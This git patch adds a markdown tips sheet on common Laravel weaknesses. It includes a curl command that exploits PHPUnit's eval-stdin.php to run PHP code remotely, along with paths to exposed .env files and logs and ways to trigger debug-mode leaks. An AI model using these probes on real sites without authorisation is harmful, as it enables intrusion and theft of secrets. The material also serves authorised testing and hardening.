From 8b8613272ec277b105e879bff8c56db84db0fbd6 Mon Sep 17 00:00:00 2001
From: Muhammad Daffa <36522826+MD15@users.noreply.github.com>
Date: Tue, 8 Sep 2020 17:26:12 +0700
Subject: [PATCH] Laravel [1]

Create laravel tips and add 4 tips
---
 Framework/laravel.md | 26 ++++++++++++++++++++++++++
 1 file changed, 26 insertions(+)
 create mode 100644 Framework/laravel.md

diff --git a/Framework/laravel.md b/Framework/laravel.md
new file mode 100644
index 0000000..e4161d0
--- /dev/null
+++ b/Framework/laravel.md
@@ -0,0 +1,26 @@
+# Common bug in laravel framework
+1. Laravel PHPUnit Remote Code Execution
+* Full Path Exploit : http://target.com/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
+* Affected versions : Before 4.8.28 and 5.x before 5.6.3
+
+Command
+```
+curl -d "<?php echo php_uname(); ?>" http://target.com/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
+```
+
+2. Exposed environment variables 
+* Full Path Exploit : http://target.com/.env
+
+![Environment Variables](https://1.bp.blogspot.com/-EUTxgP5XE6Q/XkgB4SyWSbI/AAAAAAAAAQA/eqtALOjLKKA46si-lIosm6cDVmxByjzIQCLcBGAsYHQ/s1600/1.png)
+
+3. Exposed log files
+* Full Path Exploit : http://target.com/storage/logs/laravel.log
+
+4. Laravel Debug Mode Enabled
+* Using SQL injection query in GET or POST method
+* Try path /logout (ex:target.com/logout)
+* Using [] in paramater (ex:target.com/param[]=0)
+
+![Laravel Debug Mode](https://hacken.io/wp-content/uploads/2019/07/laravel-screen.png)
+
+Source: [Nakanosec](https://www.nakanosec.com/2020/02/common-bug-pada-laravel.html)